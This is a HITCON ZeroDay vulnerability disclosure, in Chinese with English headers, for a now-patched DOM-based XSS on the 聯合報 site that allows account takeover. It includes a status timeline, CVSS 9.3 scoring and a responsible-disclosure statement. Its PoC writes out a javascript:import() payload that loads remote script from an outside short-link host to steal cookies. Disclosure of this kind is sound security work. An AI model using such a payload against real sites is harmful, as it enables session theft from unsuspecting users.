聯合報 Account Takeover Via DOM-Based XSS

Vulnerability Overview

ZDID: ZD-2025-01556
發信 Vendor: 聯合報
Title: 聯合報 Account Takeover Via DOM-Based XSS
Introduction: Account Takeover Via DOM-Based XSS

處理狀態

目前狀態

公開

Last Update : 2026/01/15

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2025/12/23 10:25:33 : 新提交 (由 yusheng 更新此狀態)
2025/12/28 18:20:09 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2026/01/06 18:01:30 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2026/01/06 18:01:30 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2026/01/07 09:21:43 : 已修補 (由組織帳號更新此狀態)
2026/01/15 03:00:13 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2025-01556
通報者：cat1528985 (yusheng)
風險：高
類型：基於 DOM 的 XSS (DOM-based Cross-Site Scripting)

參考資料

攻擊者可經由該漏洞竊取使用者身份，或進行掛碼、轉址等攻擊行為。

漏洞說明： OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

防護原則：
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

XSS 防禦繞過方式：
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

PoC

受害者在登入情況，點擊帶有惡意參數的網址，就會觸發 DOM-Based XSS
DOM-Based XSS 的觸發點為 setTimeout("window.location=url",1000);
可控制 querysrting 的 url，注入 javascript:import('//lihi.cc/yhp3P')，即可載入惡意 JS，竊取受害者的 cookie 等等
javascript: 後面可以接任意 JS 程式碼

影響

同先前回報的 3 個 Stored XSS 漏洞

建議修補方式

url 參數要驗證

責任聲明

所有測試均在本人擁有的帳號間進行
未存取任何第三方使用者資料
未對系統造成實際損害
依循 Responsible Disclosure 原則通報

漏洞嚴重度

CVSS 3.1 評分: 9.3（Critical）
評分向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

評分說明:

AV:N (Attack Vector: Network) - 可遠端攻擊
AC:L (Attack Complexity: Low) - 攻擊簡單
PR:N (Privileges Required: Low) - 不需註冊帳號
UI:R (User Interaction Required) - 需受害者點擊帶有惡意參數的網址（社交工程）
S:C (Scope: Changed) - 跨使用者影響
C:H (Confidentiality: High) - 完整竊取 session
I:H (Integrity: High) - 可執行任意操作
A:N (Availability: None) - 無直接可用性影響

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

聯合報 Account Takeover Via DOM-Based XSS - HITCON ZeroDay

Vulnerability Detail Report